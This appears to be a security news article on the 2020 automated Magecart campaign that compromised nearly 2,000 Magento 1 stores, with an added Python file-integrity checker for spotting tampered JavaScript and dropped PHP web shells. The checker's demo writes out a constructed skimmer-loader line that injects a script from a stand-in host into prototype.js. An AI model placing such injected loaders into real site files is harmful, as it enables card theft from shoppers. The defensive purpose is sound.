The Largest Automated Magento Hack In Five Years

E-commerce stores still running Magento version 1 have been exposed to attack since the product reached End-of-Life (EoL) in June 2020, after which it no longer receives security patches. Visa had already urged online merchants in April to migrate to Magento 2.x. Most recently, an automated Magecart campaign was found targeting thousands of vulnerable e-commerce stores worldwide with a previously unseen skimmer.

From the beginning

According to Sanguine Security (Sansec), nearly 2,000 Magento 1 stores (1,904 by the daily counts below) were compromised in a single automated campaign that planted a credit card skimming script.
  • On September 11, ten stores were infected with the unique skimmer; the campaign ramped up the next day with 1,058 sites hacked, 603 more on September 13, and an additional 233 on September 14, following the classic Magecart pattern of a short, high-volume burst.
  • The attackers abused the Magento Connect (downloader) feature to download and install several malicious files, including a web shell named mysql.php. Once the skimming code had been injected into prototype.js (on Magento 1 sites) or jquery.js (on Magento 2 sites), the installer files were automatically deleted, leaving the modified JavaScript as the main persistent artifact.
  • The campaign is believed to have started with a zero-day exploit that a threat actor using the handle ‘z3r0day’ advertised for sale on hacker forums in August.
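The attack chain above leaves two kinds of traces on disk: a static JavaScript file that was changed after deployment and a PHP file that should not exist (and which the attackers remove once the injection is done). The following file-integrity check is an added example, not Sansec's tooling or code from the original article. It hashes a known-clean webroot into a baseline, re-scans later, and triages the differences: modified .js files as skimmer candidates, newly added .php files as web shell candidates. The directory layout, the prototype.js contents, the loader line appended to it and the mysql.php stand-in are all constructed for the demo; the real skimmer and web shell contents are not reproduced here.

```python
import hashlib
import tempfile
from pathlib import Path

# Triage rules: skimmers in this campaign were injected into shipped JS
# libraries, the web shell was a dropped PHP file.
JS_SUFFIXES = {".js"}
PHP_SUFFIXES = {".php", ".phtml"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Hash every regular file under root. Run this once on a known-clean
    install (ideally straight from the release archive) and store the result
    off-host so an attacker with a web shell cannot rewrite it."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def check_integrity(root: Path, baseline: dict) -> dict:
    """Compare the live webroot against the baseline and triage the deltas."""
    current = build_baseline(root)
    modified = sorted(k for k in baseline if k in current and current[k] != baseline[k])
    added = sorted(k for k in current if k not in baseline)
    missing = sorted(k for k in baseline if k not in current)
    return {
        "modified": modified,
        "added": added,
        "missing": missing,
        # A changed shipped library is the durable skimmer indicator.
        "skimmer_candidates": [k for k in modified if Path(k).suffix in JS_SUFFIXES],
        # A new PHP file in the webroot is the web shell indicator, while it lasts.
        "webshell_candidates": [k for k in added if Path(k).suffix in PHP_SUFFIXES],
    }


def demo() -> dict:
    """Constructed scenario: clean webroot -> baseline -> tampering as described
    in the article -> web shell cleaned up by the attacker. Returns the findings
    at both stages so the effect of the cleanup is visible."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        js = root / "skin/frontend/base/default/js/prototype.js"
        js.parent.mkdir(parents=True)
        # Placeholder content standing in for the real Prototype library.
        js.write_text("/* Prototype JavaScript framework (placeholder) */\n")
        (root / "index.php").write_text("<?php require 'app/Mage.php';\n")
        baseline = build_baseline(root)

        # Stage 1: a hypothetical loader is appended to prototype.js and a
        # web shell stand-in is dropped at a hypothetical location.
        with js.open("a") as f:
            f.write("var s=document.createElement('script');"
                    "s.src='https://cdn.example/loader.js';"
                    "document.head.appendChild(s);\n")
        (root / "mysql.php").write_text("<?php /* constructed web shell stand-in */\n")
        while_present = check_integrity(root, baseline)

        # Stage 2: the attacker deletes the web shell; only the JS change remains.
        (root / "mysql.php").unlink()
        after_cleanup = check_integrity(root, baseline)

        return {"while_webshell_present": while_present, "after_cleanup": after_cleanup}


if __name__ == "__main__":
    for stage, findings in demo().items():
        print(stage, findings["skimmer_candidates"], findings["webshell_candidates"])
```

Because the installer files are removed once the injection lands, a scan that only looks for stray PHP files will usually come back clean after the fact; the modified prototype.js is what survives, which is why the baseline should be taken from the release archive rather than from a host that may already be compromised.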

Magecart era

The number of e-commerce sites targeted by Magecart and related groups has risen over the past few months.
  • Magecart attackers were found using the encrypted messaging service Telegram as a data-exfiltration channel for stolen card data.
  • In July, Magecart attackers targeted the online stores of large U.S. retailers and organizations, including Technokain Solutions, the Consumer Electronics Show, the Consumer Technology Association, and Claire's.
  • In June, Magecart skimmers were found on the payment websites of eight U.S. cities across three states.

The bottom line

The scale of September’s incidents illustrates how automated, sophisticated, and profitable web skimming has become. Magecart attacks are now a problem for every Magento developer and merchant, and no further security patches will be issued for Magento 1. Merchants should migrate all remaining Magento 1 infrastructure to Magento 2 as early as possible and, in the meantime, monitor shipped JavaScript and the webroot for unexpected changes.